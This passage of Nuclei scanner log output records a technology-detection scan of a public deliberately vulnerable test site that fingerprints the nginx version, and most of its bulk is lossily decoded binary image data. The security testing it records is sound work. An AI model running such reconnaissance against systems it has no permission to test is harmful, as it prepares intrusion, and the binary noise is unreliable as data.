fffd\\u0002\\ufffd\\u0015\\ufffd\\u001fO\\u0003\\ufffd\\ufffd\\u0001\\ufffd\\u0002\\ufffd(\\ufffdj\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:53.618914207Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"path\":\"/pictures/6.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /pictures/6.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4345\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:34:53 GMT\\r\\nEtag: \\\"4dca64a1-10f9\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001d\\u0000\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0003\\u0005\\u0006\\u0007\\u0008\\t\\u0002\\u0001\\ufffd\\ufffd\\u0000:\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0001\\u0006\\u0004\\u0004\\u0007\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061\\u0007\\u0013\\\"AQa\\u00142q\\ufffd\\ufffd\\ufffd\\u0015#B\\ufffd\\u0008R\\ufffd\\ufffd\\u0016$br\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0006\\u0005\\u0007\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0001\\u0006\\u0005\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0005\\u0012A\\\"\\u0006\\u0013\\u0014aq\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdBQ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdJR\\ufffd\\u0000\\ufffd~\\ufffd\\ufffd\\ufffd'\\ufffd\\rz5\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffdPU\\ufffdpT\\u0012\\t\\ufffd$\\ufffda߷֛)\\ufffd\\u001f\\ufffd\\ufffdT\\ufffd\\ufffdĩUn \\ufffd\\ufffdy!\\ufffd7\\ufffdXث\\ufffd\\ufffd\\n\\ufffdpA\\u0007\\ufffd~C\\u001b\\ufffd*\\ufffd\\u0012\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdO`)\\ufffd\\u0014\\ufffd[n?\\u000bm\\ufffd\\ufffd\\ufffd_\\ufffd\\ufffdFv\\ufffd\\ufffd\\ufffd@Hls\\ufffd\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd:\\ufffdu\\u000f\\ufffd\\ufffdݣ\\ufffde.\\ufffd\\ufffd\\\"\\ufffdG\\ufffd#\\u003c7\\ufffd\\ufffd#\\u0004\\ufffd0Mh\\ufffd)\\ufffdq.\\t\\u001dR^\\t\\ufffd\\u0015\\ufffd\\u0017\\ufffd]iڽ\\ufffd\\ufffd-\\ufffd\\u0013,',\\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003c\\ufffd;\\ufffd\\ufffdgu\\u001e\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdP\\t\\ufffde\\ufffd7*\\ufffd\\ufffd'\\ufffd\\u0000\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u000cVR\\ufffdLH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\u001c\\ufffdˑ\\ufffd\\u0007\\u0015\\ufffdi]=\\u0012\\ufffd+.X\\u00101\\ufffd\\ufffd\\ufffd9\\u0003۵f\\ufffd\\ufffdI\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\ufffdMa\\u001cg\\ufffd\\ufffdM\\ufffd^\\ufffdkp1$M\\ufffd\\ufffd\\u0010\\u000f\\ufffd\\u0019\\u0000\\ufffd\\ufffd\\u0011\\ufffd\\\"\\ufffdWV\\ufffd/OEu%\\ufffd\\u0017\\u0010\\ufffd,\\ufffdݸ\\u003ep0\\ufffdl\\ufffd\\ufffd\\u0003 \\ufffd\\\\v\\ufffd\\ufffd=K\\ufffdE\\ufffdot\\ufffd\\ufffd\\ufffd[iZ3\\ufffd\\n\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffdE\\ufffd\\ufffd\\ufffd;rS\\ufffd\\ufffd[-ԥ*\\ufffd\\u0008\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\nR\\ufffdDŽ\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\u0012\\ufffd\\ufffd६\\ufffdC ~1\\ufffd\\u001c烐p1ۜT:\\ufffdEzx;,xHt \\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd[T\\ufffd\\ufffdOan\\ufffd\\ufffd\\u0014\\ufffd6]FH \\ufffd\\ufffd~\\u000e\\ufffd\\ufffd\\ufffd\\ufffdJi\\ufffd\\ufffd\\u0014\\ufffd\\ufffdj;\\ufffd\\ufffd\\ufffdOW\\ufffd\\u001f\\ufffd\\u001f53\\ufffd\\ufffd4\\ufffd\\ufffdn$\\ufffd\\ufffd9\\u0012eo0\\ufffd`\\ufffdb\\ufffd9\\u0001\\ufffd#,\\ufffd\\ufffd\\u0004\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd.\\u0012g\\ufffd[{\\ufffd\\\\1\\u000c\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdazj\\ufffd\\ufffd\\ufffd\\ufffd-\\u003e\\ufffd\\ufffd\\ufffdMa\\ufffd\\ufffd\\u0011\\ufffdꚽ\\ufffd\\ufffd\\u0018f\\ufffdG\\ufffdq\\u0012\\u0026\\ufffd\\u00263\\ufffd\\ufffdQ\\ufffd0T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd[^\\ufffdIs\\ufffdtp\\ufffd[1\\u000c{\\ufffd\\r\\ufffd\\ufffd~\\u0004\\ufffd\\u0000z\\ufffd5\\ufffdG\\u0012eG\\ufffd:\\ufffd@8'\\ufffd\\u001e@\\ufffd \\u0001\\ufffd\\ufffd\\u0000H\\ufffd\\\\6\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd \\ufffd\\u001c\\ufffdƌz\\ufffd\\ufffd;\\ufffd\\ufffd1\\ufffdy\\ufffd\\ufffd\\u0013\\\\\\ufffd=\\ufffd\\ufffd\\ufffd\\n*\\\\~ÝUJO(\\ufffdZD!\\u0002$\\ufffd\\ufffde\\ufffd\\u000eCn\\u001fF\\u001c\\u001fʯ\\ufffdt\\ufffdw\\ufffdK\\u001cc\\u0002u-\\u001b\\ufffd68\\ufffd\\u0019?\\\\sߜ\\ufffdqY\\ufffd\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffd뱉b\\n\\ufffd\\ufffd\\ufffd\\u003e~\\ufffdZ\\ufffd\\ufffd8S\\ufffdQ\\ufffd\\ufffd\\ufffds\\ufffdU;z\\ufffd\\ufffd\\ufffd\\ufffd̙(\\ufffd\\ufffd[\\ufffdX]DV\\u001b\\ufffdW}\\ufffd\\u0002\\\\\\u0000\\t\\u001c\\u001e\\ufffd\\ufffd\\ufffd\\u0008\\ufffdY\\ufffd\\ufffdh\\ufffdF\\ufffd\\ufffd\\n4\\ufffd\\ufffda\\ufffd\\ufffd8\\ufffdl\\ufffd\\u001e;\\ufffd\\u0013\\ufffd*\\ufffd5\\ufffd\\ufffd^-\\ufffd\\ufffd3\\ufffd\\u0001 pO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\u0003\\u0018\\ufffdn#B\\u0019J\\ufffd\\u003c\\ufffd\\u001e\\ufffd\\ufffd]F\\ufffd\\ufffd/\\ufffd'zQ\\ufffd\\ufffdd\\ufffd0\\\\}\\ufffdy\\u001b|ou4H\\u0013\\ufffd\\ufffdY\\ufffdg#\\ufffd\\ufffd3\\\\\\ufffd\\ufffd$\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\\"G\\ufffdZ\\ufffd\\ufffd1\\ufffdy\\ufffd\\u00267\\ufffd\\ufffd\\ufffd3\\ufffd\\u0000\\ufffd}\\ufffd\\ufffd.\\ufffd\\ufffd\\ufffdNH\\ufffd\\ufffd0\\ufffd\\r\\ufffdg\\t\\ufffdL\\u0012\\u0000\\ufffd\\ufffd\\ufffdX\\u000f\\ufffd\\u001e\\u001f\\ufffd\\ufffd\\ufffdؠ\\ufffd\\ufffd\\u001e\\ufffd\\u000c\\ufffdu\\ufffd\\ufffdp\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\u0014\\ufffd\\\\\\ufffd\\ufffd\\u0007\\u0007\\u0018=N\\ufffd\\ufffd#\\ufffd\\ufffdE\\ufffd\\ufffd/)\\ufffd\\ufffd\\ufffd7\\ufffd{\\u000c.N \\ufffdJԬ\\ufffd\\ufffdo\\ufffd,\\ufffd#1\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*-zj\\ufffdtr\\ufffd*\\ufffdA\\\"\\ufffd\\ufffd\\ufffda\\u0013\\ufffd\\\"\\ufffd\\u000e\\u000b\\u0000\\t\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd@\\nR\\ufffd\\u0000\\ufffd)@\\nݽ\\u0019\\ufffd\\u000e\\ufffd\\ufffdtJi7\\ufffd;\\u000f\\ufffd\\u0008\\u001d\\u0004W6Q\\ufffd^bn\\u001b\\ufffd\\ufffdr\\ufffd\\u0000\\u0001݇\\u000cG\\ufffdq\\ufffd\\ufffd*U}N\\ufffd\\ufffdTT-YI\\ufffdt\\u0026\\ufffd\\ufffd\\u0013\\ufffdn\\ufffd\\ufffd\\ufffd7\\ufffdtKy\\ufffdn-\\ufffd%x\\u0004\\ufffd\\u0008Ϩ\\u000c.C\\u0002\\u0000ʳ\\u0005$pH8\\ufffd\\u0008[\\ufffd\\ufffd\\\"]\\ufffd-\\ufffd\\ufffd\\ufffd,\\ufffdr-\\\\\\u0004i\\ufffd\\ufffd#.Oel\\u0010\\u001b\\ufffd;O#\\u0019\\ufffdO\\n\\ufffd@\\ufffd\\ufffd}n9\\ufffd.\\ufffd\\u000f i\\ufffd\\u0007\\ufffd\\ufffdo\\ufffd\\u0003\\ufffd\\nϺ\\ufffd\\ufffd[\\ufffdg\\ufffd4\\ufffdm\\u003c\\ufffd:\\ufffd\\ufffdY\\ufffd\\ufffd+mf\\ufffd\\ufffd\\ufffdn\\ufffd\\u0015\\ufffdM\\ufffd\\ufffdFw\\ufffd\\ufffd\\u0007z\\ufffd_\\ufffdŰԿq\\ufffd1\\ufffd\\ufffd\\u001f,y-\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffd}2\\ufffd\\u0005 x\\ufffdQ\\u003cBkq'\\u000f\\ufffd\\u0003r\\ufffd\\ufffd\\ufffdI\\u0003\\u001f\\u0004|\\u001a\\ufffd%\\ufffdb΀\\ufffd\\u0007'\\ufffd\\ufffd.\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdݕ\\ufffd\\ufffd\\ufffd\\ufffd\\u0015i!\\ufffd+\\ufffd1\\ufffd\\u0001\\u000e\\ufffd%\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\ufffdF+=\\ufffdb\\ufffd\\ufffd1ナ\\ufffdYMt݋\\ufffd\\ufffdș\\ufffd\\u0019Dt\\ufffd\\ufffd\\u0014\\\\\\ufffd\\u000e_fcRC}x\\ufffd\\u000fDZ\\ufffd\\u003e\\ufffd\\rݵմ\\ufffdkr\\ufffd\\u0016\\ufffd\\ufffd\\u0000ψ\\ufffd\\ufffd^0Ɂ\\ufffd\\\\\\u0013\\ufffd\\u00169\\u003c\\ufffd\\u0001W8\\ufffdY\\ufffdz\\u0015\\u003c\\ufffd;Np\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\u0003\\ufffd\\u0004\\u000eǸ\\ufffd\\ufffdДc?W\\u0001\\ufffd\\ufffd\\\"\\ufffd\\\\%\\ufffd@\\ufffd\\ufffd'\\u0001\\ufffd\\ufffdʺ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffd\\u0000\\u001a\\ufffdP\\ufffd\\ufffd7\\ufffd\\ufffd\\u001f\\ufffd \\ufffdK;\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0006\\t\\\\z\\ufffd\\u0017\\ufffd\\u0005\\ufffd\\ufffd0\\ufffd\\ufffdrx\\u0018\\u0019\\ufffdn)\\ufffdM\\ufffd\\ufffd_\\ufffdG\\\"5\\ufffdI%\\ufffd\\ufffd\\t\\u0002V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqT\\ufffd\\ufffd/,\\u000e\\ufffd\\u0019]C\\ufffd\\u0003\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u0003R\\ufffd\\ufffd\\ufffda\\u0001\\u0016\\ufffd\\u0014h\\ufffdE\\ufffd\\ufffd1\\u0004\\ufffdp\\u000f\\u001f8\\ufffd\\ufffdQU\\\\\\ufffd\\ufffd\\u0016^E\\ufffd74w\\ufffd\\ufffd\\u0010\\ufffdp\\ufffdsG\\ufffdb\\ufffd\\u0015\\u0001fE?˺\\u0000\\u0000\\ufffd\\ufffd\\ufffdl\\u0000\\u0003\\u001e;\\u0006\\ufffd\\ufffd.\\u0003ᯄ6\\ufffd\\u00163[u\\ufffd\\ufffdMQ\\ufffd%b\\ufffd\\ufffdhT*\\ufffd0R;\\ufffd'\\ufffd\\ufffd\\\\`溺\\ufffd\\u0000$\\ufffd\\ufffd\\u003c\\ufffd(0\\ufffd\\u0018\\ufffd\\u0000|`\\ufffd\\ufffdU\\ufffdP\\ufffd\\ufffd]ķ\\ufffd!\\ufffdB\\ufffd\\u003e0T\\ufffda\\t\\ufffd\\ufffd\\u0019\\u001e\\ufffd\\u0000\\u0011\\ufffdgAG]\\ufffdQ\\ufffd\\ufffdf\\ufffd\\ufffd\\ufffd\\u0000RǏ\\ufffd\\ufffd\\\"\\ufffd\\u001c\\ufffd\\ufffd5~\\ufffd\\ufffdt\\ufffd\\ufffdM\\ufffd6\\ufffd\\ufffd$p\\ufffd\\ufffdI\\ufffd\\ufffd+\\ufffdm\\ufffd\\u000c\\u0002{\\ufffdx\\ufffd\\ufffd9\\u000bZ\\ufffd.\\ufffdmR\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003c\\u0010\\u000e\\u0008\\ufffd}\\rz;\\u000cP\\ufffd\\u001cN\\ufffddP7F㜃\\ufffd\\ufffdpG\\ufffd\\ufffd\\\\\\ufffd\\ufffd'|5\\ufffdL\\u000f\\ufffdZ4\\u0011\\ufffd\\ufffd)k\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd#.J\\ufffdz\\u0007$\\ufffd=9\\ufffd8\\u0002\\ufffd~\\ufffdu\\ufffd\\ufffdt^\\ufffd\\ufffd\\u001f_\\ufffd3Q\\u00055\\ufffd\\ufffd\\ufffd\\\\\\ufffd)[€\\ufffd)@\\nR\\ufffd\\u0000\\ufffd)@\\u001d5\\ufffd7\\ufffdK'H\\ufffd\\u001a\\ufffd\\ufffd\\ufffd}.O9\\u001eFr\\u0004\\u001d\\ufffd*\\ufffd\\u000b(\\ufffd\\r\\ufffd\\ufffdv\\u001c1\\u003co\\ufffd\\ufffdEK[\\ufffd\\ufffd\\ufffd\\ufffd1R$i\\u000b\\u0015\\ufffdc@\\ufffd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\ufffd\\ufffd\\u001c\\ufffd\\n\\ufffd\\ufffd@\\ufffdnt]R\\u001b\\ufffd6ı\\ufffd\\ufffḑ\\ufffdS\\ufffd\\ufffdEu\\ufffd\\ufffd\\ufffd\\ufffd%\\ufffd\\ufffdq̗\\ufffd\\ufffdл\\u001c\\u0003\\ufffd$\\ufffd\\u0019\\ufffd\\ufffd)\\ufffd\\ufffd\\u000c\\ufffd\\rb\\ufffd\\ufffd\\ufffd**WU\\ufffd\\ufffd\\ufffdOgz\\ufffdf\\ufffdԄ\\ufffd\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd-\\u003c *\\ufffd\\ufffd\\u0000d1\\ufffd\\ufffd\\u0014c\\u003c\\u001f\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffdIm$\\ufffd\\ufffd:\\u000f0\\u0014V_Ab\\u0007\\ufffd\\ufffd\\u0004\\u0015*W$\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd;M\\u0006\\ufffdSYLRYrʌ]\\ufffd\\ufffd\\u0014\\u000e\\u0007\\ufffd\\ufffd\\u00198\\ufffd\\t\\ufffdlU\\ufffdÿ\\u0013\\ufffd\\ufffd\\ufffdd\\ufffd\\u0013ej\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\u0000\\u0018e*\\ufffd6{z\\u0018}\\ufffd\\u000e\\u001d\\u001d3U\\n%j_-\\ufffd\\ufffd\\u0000G\\ufffd4\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdbIc\\ufffdf\\u0001ܣ%\\u001aA\\ufffd'\\ufffdRN\\u0014\\n\\ufffdb\\u003eߤ\\ufffd\\ufffd\\ufffd\\u003eZ2\\ufffdg\\u0008\\ufffd\\ufffdr\\ufffd\\ufffdr\\n\\ufffd#\\ufffd\\ufffd\\ufffd-N\\ufffd\\ufffd\\ufffd\\t\\ufffdl\\ufffd2\\ufffdBF\\u000f\\ufffd\\u0011\\ufffdE}i\\ufffd\\ufffd'\\ufffd\\ufffdܬ2yh\\ufffd\\ufffdlM\\ufffd\\ufffd\\ufffd\\ufffd@?\\ufffd\\u000f\\u001d\\ufffd\\ufffd)O\\ufffd\\u0012\\ufffd\\\"4\\ufffd\\ufffd\\u0017\\u000b4A\\ufffdӆ(\\ufffdN@e$0\\u0007\\u0003 \\u0010Goj4\\ufffd\\u0000b\\ufffd\\ufffdW\\u0002\\t1\\ufffdg\\u003cq\\ufffd\\ufffd?\\u000b\\ufffd1\\ufffd\\ufffd\\ufffdN\\u0013\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffd8\\u000e\\ufffd\\ufffd1\\u001a\\ufffd\\u0007\\ufffdrs\\ufffd\\ufffd\\u0000J\\ufffd4{\\ufffd{eNy\\ufffd\\ufffd\\u0000l\\ufffd\\ufffd\\ufffdN\\ufffd'\\r\\ufffd\\ufffdڟ%\\ufffd\\ufffd9?\\ufffd\\\\H\\ufffd\\ufffd樑d\\u000e\\ufffdy\\ufffdvc\\u0018\\ufffdl\\u001eC\\u000c\\ufffd\\ufffdc?\\ufffd\\ufffdu\\u0017\\ufffd:\\ufffd\\u0018\\u0015 \\ufffd\\ufffd\\ufffd9\\u0007\\ufffd\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffdh\\ufffdf\\ufffd\\ufffdN\\ufffd? g\\ufffd##\\u003e٩v\\ufffd)q\\n\\ufffd\\u0013\\u0006\\u000c\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd9+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffdأ%\\ufffd\\ufffd}\\ufffd\\u0018\\u0000x݁uw\\u003cr2\\ufffdy\\ufffd\\u0019\\ufffd܏bI0z\\ufffdN\\ufffdR\\ufffd\\ufffd\\ufffdh\\ufffd{gc\\ufffdG*\\ufffd\\ufffd\\ufffdF\\u0018!\\ufffd\\u000er;\\u000c\\ufffd\\ufffdo\\ufffd!\\ufffdX\\ufffd\\ufffd\\ufffdv\\ufffd\\u0000\\ufffd\\u0003\\u0003;\\ufffd d\\ufffd\\u0000H'\\u0007\\ufffd\\ufffdy\\u0014Yb\\ufffd\\ufffd\\ufffd\\ufffd/\\u001f\\ufffd\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffdBj:O^\\ufffd\\ufffd\\ufffd\\ufffdks~\\ufffd\\ufffde\\ufffd\\ufffd\\u000b\\ufffd\\ufffd\\u000c7#\\ufffd\\u0001\\ufffdOr\\u0006\\u0001\\u000c=\\ufffd\\ufffdֽ\\u0019\\ufffd\\ufffdeݬ\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdȌ\\u001d\\u001cP\\u000c?\\ufffdO\\u0004w\\u0007\\ufffdA=ܶV\\ufffdk\\ufffd$\\ufffd \\ufffd\\ufffd\\ufffdCi+\\u0016$$\\ufffd\\u0017\\ufffd9\\u003e\\ufffd\\u0019\\u001c\\u000c2ջ\\ufffd.\\ufffd\\ufffd\\ufffdΓ\\ufffdѵ+cotS̷\\ufffd\\u001b\\\\E0\\ufffd\\n\\ufffd3\\ufffd0r\\u0001*\\ufffd\\ufffd\\ufffd6\\ufffdj\\ufffd\\ufffd\\\\m\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^zd\\ufffd\\ufffd\\ufffd\\ufffdVs\\ufffdx[\\ufffd\\ufffde\\ufffd\\ufffduu\\ufffdI\\ufffdm8o\\ufffdt\\ufffd\\u0018\\ufffd\\ufffd\\ufffd\\t\\ufffd̀\\u001eX\\u000c.\\u0018\\u001c\\u0015l`ղ\\ufffd\\ufffd\\ufffdY\\ufffdI\\ufffd\\n\\ufffd.\\u003c\\ufffdR\\ufffd \\ufffd\\ufffd\\ufffd\\u0000+$鞮\\ufffdzz\\ufffdh\\ufffdXs\\ufffdE\\ufffd\\ufffdS\\u00122G\\u003e\\ufffdc\\ufffd\\ufffdt\\ufffd\\ufffd\\u0011\\ufffdĖP\\ufffd\\ufffd\\ufffd\\u0026˩\\ufffdM\\u0014\\ufffd\\ufffdw\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,\\t\\ufffd\\u003e\\ufffd\\u0000P)\\ufffdj7:N\\ufffd\\r唅'\\ufffd\\ufffd\\u0003\\ufffd~\\ufffd\\ufffdj\\u0015)ZMa\\ufffd\\ufffd:\\ufffd\\ufffdz\\ufffd\\u0014\\ufffdi.\\r\\ufffd0\\ufffd\\ufffdb\\ufffd6\\ufffd.~\\ufffd\\u0012I\\ufffd\\ufffdϾs\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdV\\r\\ufffd\\ufffd\\ufffd˒\\ufffd\\u0016%s\\ufffd\\u003c\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffd\\\\\\ufffdG\\ufffd7NH\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffd\\u003cՌ\\u003eF@,\\ufffdw\\u0003\\ufffds\\ufffd9\\\"\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=jd\\u0026W\\ufffd\\ufffdԏ1\\ufffdm\\ufffd\\ufffdڟ@\\ufffd\\ufffdܱ\\ufffd\\ufffd\\u0005\\ufffd4\\ufffd\\ufffdl\\ufffdQ\\ufffdK)\\ufffd|c\\ufffd:TNV\\ufffd\\u0026f)\\u0000:\\ufffd\\ufffd\\u000c9\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000f|\\ufffd\\ufffdH\\ufffd\\ufffdKx\\ufffd9\\ufffdYa\\ufffd\\u000c\\ufffdT\\ufffd\\ufffd.J\\ufffd\\ufffd]\\ufffd%\\ufffdw\\ufffd|\\ufffd\\u00260\\ufffdw\\u0003\\ufffd\\u000foҲ\\ufffd\\u000eܢ\\ufffdc\\ufffda\\ufffd\\\\SP\\ufffd\\ufffd\\u0011$2\\ufffd\\ufffd7\\u001b\\ufffd\\ufffd|~+\\u001b\\ufffd\\ufffd[[\\ufffd\\ufffd\\ufffd\\ufffd0$\\ufffdô\\u0010s\\ufffd~y\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-/\\ufffd\\ufffd_4D\\ufffdޑ\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd@\\u001f#\\ufffd\\ufffdS5m@\\\\\\ufffd\\u001e\\ufffd0ϸ\\ufffd2\\ufffd\\ufffd($\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffdN\\u001a\\u0019S-\\ufffdc\\ufffd\\ufffd62\\ufffd5\\ufffdV\\ufffdt\\ufffd\\ufffd\\ufffdVR\\ufffd\\u0019\\ufffd~\\ufffdF\\u0008 \\ufffd`\\ufffdԻ=v\\ufffd\\ufffd\\ufffdV2\\u003c\\ufffd\\u0002\\ufffdbA\\ufffd\\ufffd\\u00001' \\ufffd\\u00003ܑ\\ufffdyƓ\\ufffd\\ufffdR\\ufffdU\\ufffd\\u001d\\ufffd\\ufffd\\u0018\\ufffdE\\ufffd\\ufffd9ܟ\\ufffd\\u0003۱\\ufffd\\ufffd\\ufffd\\ufffdT=T\\ufffdƭ\\ufffd\\ufffdRyU7\\ufffd*\\ufffd\\ufffd\\tu\\u0005\\ufffdG\\u0003qQ\\ufffd\\ufffd\\ufffdƬˢO\\ufffde\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\ufffdQ\\ufffd:\\ufffd\\ufffd5\\ufffds\\ufffdF\\ufffdl\\ufffd\\u0008#\\ufffd\\u000fЃ\\ufffd\\ufffd\\ufffd\\ufffdZMom\\ufffd\\ufffds2\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd`\\u001229\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd{v\\ufffd\\u001c\\ufffd\\ufffdV\\ufffd\\u0018u#\\ufffd\\ufffd@\\ufffd\\ufffd\\\\\\ufffd\\ufffd_X\\ufffd\\ufffdRА;\\\\+\\ufffdY\\ufffd}\\u0003\\ufffd\\ufffd\\u001c\\ufffd\\ufffd+\\ufffd\\ufffd*N\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd?an\\ufffdW\\u0013lx\\ufffd\\ufffd/\\ufffd\\ufffd\\u00